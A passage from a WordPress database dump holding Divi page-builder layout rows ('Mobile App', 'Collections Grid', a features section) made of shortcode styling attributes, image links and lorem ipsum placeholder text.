disabled_on=\"off|on|on\"]\n\n\n\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>It\'s a title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"24\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\n\n\n\n[/et_pb_divider][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/071-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"34\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\n\n\n\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>It\'s a title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\" disabled=\"off\" disabled_on=\"on||\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"14\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\n\n\n\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>It\'s a title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"14\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\n\n\n\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>It\'s a title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"50px||110px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"LEARN MORE\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#2e9bb5\" button_bg_color=\"#ffffff\" button_border_width=\"13\" button_border_color=\"#ffffff\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#ffffff\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\"]\n\n\n\n[/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Mobile App','','publish','closed','closed','','mobile-app','','','2016-05-27 19:42:19','2016-05-27 17:42:19','',0,'https://companyregistration.online/et_pb_layout/mobile-app/',0,'et_pb_layout','',0),(5734,1,'2016-05-27 19:42:34','2016-05-27 17:42:34','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/bg3.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"620px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Collections\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#a5bdc9\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n<p>Collections</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Explore the world through collections of beautiful stock photos.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" background_color_1=\"#ffffff\" parallax_2=\"off\" parallax_method_2=\"off\" background_color_2=\"#ffffff\" parallax_3=\"off\" parallax_method_3=\"off\" background_color_3=\"#ffffff\" column_padding_mobile=\"on\" custom_padding=\"60px|||\" gutter_width=\"2\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/01_thumb1.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/02_thumb1.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03_thumb2.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" background_color_1=\"#ffffff\" parallax_2=\"off\" parallax_method_2=\"off\" background_color_2=\"#ffffff\" parallax_3=\"off\" parallax_method_3=\"off\" background_color_3=\"#ffffff\" column_padding_mobile=\"on\" custom_padding=\"10px|||\" gutter_width=\"2\" custom_padding_tablet=\"-10px|||\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_thumb.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/05_thumb.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06_thumb.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"50px||110px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"LEARN MORE\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#ffffff\" button_bg_color=\"#1fbacd\" button_border_width=\"13\" button_border_color=\"#1fbacd\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#1fbacd\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\"]\r\n\r\n\r\n\r\n[/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Collections Grid','','publish','closed','closed','','collections','','','2016-05-27 19:42:34','2016-05-27 17:42:34','',0,'https://companyregistration.online/et_pb_layout/collections/',0,'et_pb_layout','',0),(5735,1,'2016-05-27 19:42:58','2016-05-27 17:42:58','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Features\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Features</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Built to perform.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p>Built to perform.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"24px|||\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. Thanks. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"54px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Text Title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Text Title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Text Title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Text Title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||124px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Text Title</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" 